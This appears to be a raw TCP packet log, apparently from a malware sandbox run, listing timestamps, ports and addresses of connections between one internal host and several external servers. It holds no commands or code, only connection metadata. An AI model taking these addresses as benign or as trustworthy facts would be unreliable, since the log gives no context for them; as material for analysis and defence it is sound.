                                                                                      Nov 8, 2024 10:47:25.509937048 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.510128021 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.510508060 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.510518074 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.510672092 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.510672092 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.510724068 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.510725975 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.510772943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.510772943 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.510867119 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.511384964 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.511394978 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.511607885 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.511660099 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.511775970 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.511779070 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.511826038 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.511979103 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.511995077 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.512023926 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.512027979 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.512208939 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.512208939 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.512259007 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.512304068 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.512304068 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.512872934 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.512882948 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.513066053 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.513070107 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.513156891 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.513247967 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.513767958 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.513777971 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.513921976 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.513969898 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.513972998 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.514023066 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.514023066 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.514118910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.514642954 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.514653921 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.514847994 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.514847994 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.514853001 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.514894009 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.514988899 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.515000105 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.515002012 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.515006065 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.515222073 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.515312910 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.515361071 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.515455008 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.515870094 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.515880108 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.516073942 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.516073942 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.516079903 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.516119003 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.516222954 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.516832113 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.516844988 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.517009974 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.517009974 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.517071009 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.517083883 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.517095089 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.517095089 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.517226934 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.517971992 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.517985106 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.518099070 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:25.518162012 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.518162012 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.518209934 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.518264055 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.518264055 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.518333912 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.518595934 CET49777443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:25.518608093 CET44349777172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:41.983428955 CET497808000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:42.170665979 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:42.170852900 CET497808000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:42.171005964 CET497808000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:42.413908958 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:42.930535078 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:42.930627108 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:42.930638075 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:42.930754900 CET497808000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:42.930774927 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:42.930975914 CET497808000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:43.117893934 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:43.118244886 CET497808000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:43.305344105 CET80004978023.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:43.305551052 CET497808000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:44.936130047 CET497818008192.168.11.30206.206.126.252
                                                                                      Nov 8, 2024 10:47:45.270207882 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:45.270430088 CET497818008192.168.11.30206.206.126.252
                                                                                      Nov 8, 2024 10:47:45.270586014 CET497818008192.168.11.30206.206.126.252
                                                                                      Nov 8, 2024 10:47:45.646203041 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:45.666271925 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:45.666377068 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:45.666385889 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:45.666516066 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:45.666619062 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:45.666635036 CET497818008192.168.11.30206.206.126.252
                                                                                      Nov 8, 2024 10:47:45.667165995 CET497818008192.168.11.30206.206.126.252
                                                                                      Nov 8, 2024 10:47:45.667340040 CET497818008192.168.11.30206.206.126.252
                                                                                      Nov 8, 2024 10:47:46.001106024 CET800849781206.206.126.252192.168.11.30
                                                                                      Nov 8, 2024 10:47:46.001236916 CET497818008192.168.11.30206.206.126.252
                                                                                      Nov 8, 2024 10:47:46.825629950 CET4977680192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:46.948991060 CET8049776172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:47:46.949146986 CET4977680192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:47:57.682663918 CET497828000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:57.870213985 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:57.870455027 CET497828000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:57.870625973 CET497828000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:58.111860991 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:58.622476101 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:58.622488022 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:58.622494936 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:58.622503996 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:58.623011112 CET497828000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:58.810695887 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:58.810965061 CET497828000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:47:58.998724937 CET80004978223.88.71.29192.168.11.30
                                                                                      Nov 8, 2024 10:47:58.998867035 CET497828000192.168.11.3023.88.71.29
                                                                                      Nov 8, 2024 10:48:01.782895088 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:01.782931089 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:01.783154011 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:01.783287048 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:01.783293962 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.008443117 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.009551048 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:02.009562969 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.009891033 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:02.009895086 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.856764078 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.856792927 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.856836081 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.856930971 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:02.856944084 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:02.857038975 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:02.899857044 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.097362041 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.097409964 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.097470999 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.097604990 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.097618103 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.097728014 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.097807884 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.097824097 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.097956896 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.097960949 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.098146915 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.098342896 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.149882078 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.337564945 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.337775946 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.337798119 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.337915897 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.337927103 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.338069916 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.338205099 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.338265896 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.338536978 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.338541031 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.338705063 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.338959932 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.339138985 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.339194059 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.339279890 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.339283943 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.339514017 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.339731932 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.384157896 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.384164095 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.431113005 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.578511953 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.578607082 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.578963995 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.578994989 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.579176903 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.579569101 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.579576969 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.579658031 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.579706907 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.579956055 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.580451012 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.580508947 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.580537081 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.580648899 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.581108093 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.581310034 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.581598043 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.581728935 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.581732988 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.582262039 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.583030939 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.583034992 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.583986998 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.819283962 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.819509983 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.819623947 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.819849014 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.819875956 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.820238113 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.820312023 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.820316076 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.820516109 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.820522070 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.820776939 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.820981026 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.821237087 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.821697950 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.821894884 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.821894884 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.821921110 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.821926117 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.822133064 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.822747946 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.822977066 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.823601961 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.823786974 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.823792934 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.824084997 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.824084997 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:03.824327946 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:03.868984938 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.060190916 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.060194969 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.060519934 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.060580969 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.060585022 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.060770035 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.060868979 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.061465979 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.061469078 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.061584949 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.061714888 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.061817884 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.061824083 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.062066078 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.062413931 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.062716961 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.063239098 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.063302040 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.063366890 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.063513041 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.063518047 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.064147949 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.064276934 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.064284086 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.064457893 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.064990997 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.065187931 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.065253019 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.065498114 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.066059113 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.066679955 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.066828012 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.066962957 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.067012072 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.067015886 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.119059086 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.302015066 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.302020073 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.302258968 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.302696943 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.302700043 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.303210020 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.303210020 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.303220034 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.303600073 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.303647041 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.303711891 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.303800106 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.304558992 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.304563999 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.304572105 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.305203915 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.305360079 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.305634975 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.306091070 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.306096077 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.306307077 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.306488037 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.306663990 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.306667089 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.307046890 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.307250977 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.307287931 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.308171988 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.308212996 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.308212996 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.308218956 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.308970928 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.309034109 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.309740067 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.310518980 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.310661077 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.310934067 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.310940027 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.311203003 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.311805964 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.311872959 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.311969995 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.312061071 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.312063932 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.312254906 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.543504953 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.543509960 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.543607950 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.543705940 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.543715000 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.543768883 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.543776035 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.544008017 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.545844078 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.545857906 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.546055079 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.546087980 CET49783443192.168.11.30172.67.137.62
                                                                                      Nov 8, 2024 10:48:04.546096087 CET44349783172.67.137.62192.168.11.30
                                                                                      Nov 8, 2024 10:48:04.546260118 CET49783443192.168.11.30172.67.137.62
